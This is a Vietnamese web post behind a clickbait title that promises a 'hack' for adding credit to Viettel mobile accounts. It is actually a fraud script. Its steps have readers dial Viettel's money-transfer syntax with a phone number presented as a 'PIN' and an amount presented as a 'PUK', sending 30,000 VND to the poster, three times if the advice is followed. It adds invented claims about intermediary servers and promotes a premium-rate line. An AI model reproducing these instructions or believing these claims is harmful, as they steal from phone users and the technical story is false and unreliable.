Xem anh Nong' cua Cam LY

1.6K 0 0

Dịch vụ được 8x87 chính thức hoạt động ngày 05/08/2010 và được miễn phí trong 2 tháng đầu tiên,như vậy ngày 05/10/2010, 8x87 sẽ thu phí 10% mỗi lần hack thành công!

Đây là những nỗ lực và cố gắng đã tốn nhiều công sức cũng như vật chất của diễn đàn chúng tôi. Xin trân trọng gửi đến các bạn phiên bản hack được cập nhật mới nhất !

Vì Sao Chúng Tôi Phải Đăng Những Tin Shock Như Vậy : Vì Trang WED Hack Mới Được Khám Phá Nhằm Công Bố Rộng Rãi Đến Khắp Người Dùng ĐTDĐ Trên Cả Nước, Đáp Ứng Nhu Cầu Cần Thiết Của Người Dân.

Nếu Chúng Tôi Nói Là Hack Tài Khoản Điện Thoại Các Bạn Sẽ Không Tin, Vì Vậy Chúng Tôi Đăng Những Bài Không Hay Cho Lắm Nhằm Thu Hút Người Đọc Để Biết Thêm Thông Tin Về Trang WED Hack Tài Khoản Mà Chúng Tôi Mới Khám Phá . Mong Các Bạn Thông Cảm.Nếu Các Bạn Không Tin Lắm Về Trang WED Hack Tài Khoản Mà Chúng Tôi Mới Khám Phá Vui Lòng Gửi Về Hòm Maill Của Chúng Tôi: vietdark2010@yahoo.com.vn

Hoặc Gọi :19008189(200Đ 1 Phút)Để Được Giải Đáp

Xin được chia sẻ cùng các bạn một thủ thuật dùng mã hack mà tôi vừa mới khám phá:như các bạn cũng đã thấy,rất nhiều các cá nhân post bài lên các diễn đàn trong nuớc với nội dung \"hack tiền của mạng Viettel\"...để tìm được những topic như thế không hề khó.và còn rất nhiều những topic như vậy,nhưng hầu hết là của AMATEUR HACKER,chủ yếu nhằm vào mục đích vụ lợi chứ không thông thạo về chuyên môn, họ thiếu kinh nghiệm ,kiến thức và cả tính chính xác trong lĩnh vực Hack bậc thầy này,mà nó đòi hỏi phài có một trình độ Hack tương đối cao .Chính vì những lí do nêu trên và với nhiều năm kinh nghiệm của mình. Tôi Xin Tự Giới Thiệu:

Họ tên: Châu Kiệt Luân

Nghề nghiệp : Sinh viên Ðại Học Bách Khoa-BKA, Năm Cuối Khoa Công Nghệ thông tin.

Tôi không dám nhận mình là sinh viên ưu tú,nhưng với những gì mà mình tự khám phá được thì tôi thấy rất hài lòng.Chắc các bạn cũng biết tới diễn đàn HAVonline - diễn đàn hacker lớn nhất hiện nay và tôi rất tự hào khi mình nằm trong ban quản trị diễn đàn.Với những kinh nghiệm mà tôi đã có ,hôm nay tôi xin giới thiệu với các bạn cách hack tiền tài khoản Viettel hoàn toàn chính xác.Do thời gian có hạn nên tôi nói ngắn gọn như sau:

Các bạn chỉ cần thực hiện tuần tự và chính xác theo yêu cầu của 6 bước sau:

1 -Một sim Viettel hoạt động trên 230 ngày(hon 7 tháng).Tại sao phải cần vậy?Vì chỉ có những sim hoạt dộng trên 7 tháng mới được Viettel đưa vào mã bảo vệ tài khoản chuyển tiền ( 6 tháng chưa được đâu các bạn) trên server Viettel quản lí.

2 -Rất đơn giản : Soạn tin MK gửi tới 136 để lấy mât khẩu chuyển tiền của bạn( nếu bạn chưa có).Tại sao phải cần vậy ? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel.

3 -Ðổi mật khẩu chuyển tiền: các bạn gọi tới 900 ,nhánh phím số 3 và làm theo hướng dẫn..và điều quan trọng nằm ở bước này. Các bạn phải đổi mât khẩu chuyển tiền thành dãy số sau :10010010 ,đó chính là mật khẩu Server trung gian ở bước 5. Tại sao phải làm vậy?Vì khi các bạn chuyển mật khẩu thành dãy số trên tức là đã mã hóa tài khoản của bạn trên Server mà Viettel quản lý.Ðiều này rất quan trọng.

4 -Tài khoản trong sim của bạn phải có nhiều hơn 31999 Vnd.

5 -Các bạn làm theo cú pháp nhu sau: *136* mật khẩu Server *mã PIN *mã PUK#.(tương tự cấu trúc của cú pháp chuyển tiền). Để khỏi mất thời gian của các bạn tìm lại 2 mã trên nên tôi đã tạo ra một Server trung gian ( viết tắt là TIS-Telephone of Intermediacy Server) với mã PIN và mã PUK mặc định (dùng đăng nhập sdt của bạn trên Server),tóm lại, cụ thể các thông số như sau (chỉ áp dụng cho mạng Viettel):

+ mật khẩu Server: 1001 0010

+ mã PIN : 841648469178

+ mã PUK: 30000

Lưu ý ở đây PassID gồm 5 chữ số= 30000. (ba-0-0-0-0).Tại sao phải vậy? Vì chúng ta hack thông qua dịch vụ I-Share của Viettel và thuê bao số 841645605801 không phải số điện thoai bình thường mà chính là một Sever trung gian(Thuê Bao Này Sẽ Gọi Không Được Bởi Vì Đã Được Chúng Tôi Quản Lý Chặt Chẽ(Tên tiếng Anh của nó là TIS inc-Telephone number of Intermediacy Server) mà chung tôi tạo ra được nhằm để tạo ra khoảng trống trên server của Admin mang viettel và con số 30000 là PassID của Sever mà 8x87 đã tao ra để các bạn đăng nhập (tiền sẽ được Hack từ tài khoản trên Server trung gian này vào tài khoản sđt của bạn,chính một lỗ hổng nhỏ trên I-Share đã giúp 8x87 khám phá ra điều này và những lần chung toi Test gần đây đều thành công). Xin thông báo hiện nay Sever trung gian mà 8x87 tạo ra là sever duy nhất hiện nay ( đã Test).

Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp và nhấn nút gọi thì hệ thống sẽ tự động đăng nhập sdt của bạn vào TIS (Telephone of Intermediacy Server) mà tôi tạo ra và tài khoản của sdt người gửi sẽ tự đông được công thêm tiền hack được sau khi đăng nhập (tiền hack được sẽ công thêm vào tài khoản chính),thật ra đây là một trong những cách hack tài khoản điện thoại mà các Hacker chuyên nghiệp trên thế giới gần đây mới sử dụng ( nguyên lý là dùng mã hack đảo chiều các dịch vụ chuyển tiền từ các Server di đông,chẳng hạn như I-Share, hiên trên mạng có nhiều tài liệu tiếng Anh nói về vấn đề này).

6- Sau khi làm xong những bước trên : các bạn chỉ cần đợi 15 phút , sẽ có tin nhắn trả lời và tài khoản chính của các bạn đã được cộng thêm 100000 vnd. (đã Test)

Xin chú ý :

Các bạn chỉ hack được 3 lần trong 1 ngày ( có nghĩa là 1 ngày chỉ hack được 300.000 VNĐ ) và mỗi lần hack phải thực hiện liên tiếp thật nhanh để sever luôn liên tục và hiệu quả cho mỗi lần rất cao.

Lời khuyên :

Các bạn nên ' hack 3 trong 1' có nghĩa là chỉ 1 lần thao tác bạn có thể hack được 1 lúc 300.000 VNĐ và hiệu quả thành công lên đến 99,99% đấy.

Làm thế nào à ? đơn giản thôi , bạn thao tác *136* mật khẩu Server *mã PIN *mã PUK# rồi lưu vào danh bạ với 1 tên nào đó rồi bấm nút gọi 3 lần ( mỗi lần gọi cách nhau từ 5 giây đến 15 giây ) thế là bạn đã có 300.000 VNĐ trong tài khoản chính rồi đấy.

Mọi thắc mắc, yêu cầu về bất cứ vấn đề gì mời bạn gửi về họp thư

email: vietdark2010@yahoo.com.vn Hoặc Liên Hệ:19008189(200Đ/1 Phút) Để Biết Thêm Chi Tiết

Dịch vụ được 8x87 chính thức hoạt động ,8x87 sẽ thu phí 10% mỗi lần hack thành công! Support the Author - Vote, Tweet and Share on

Xem anh Nong' cua Cam LYĐọc truyện này MIỄN PHÍ!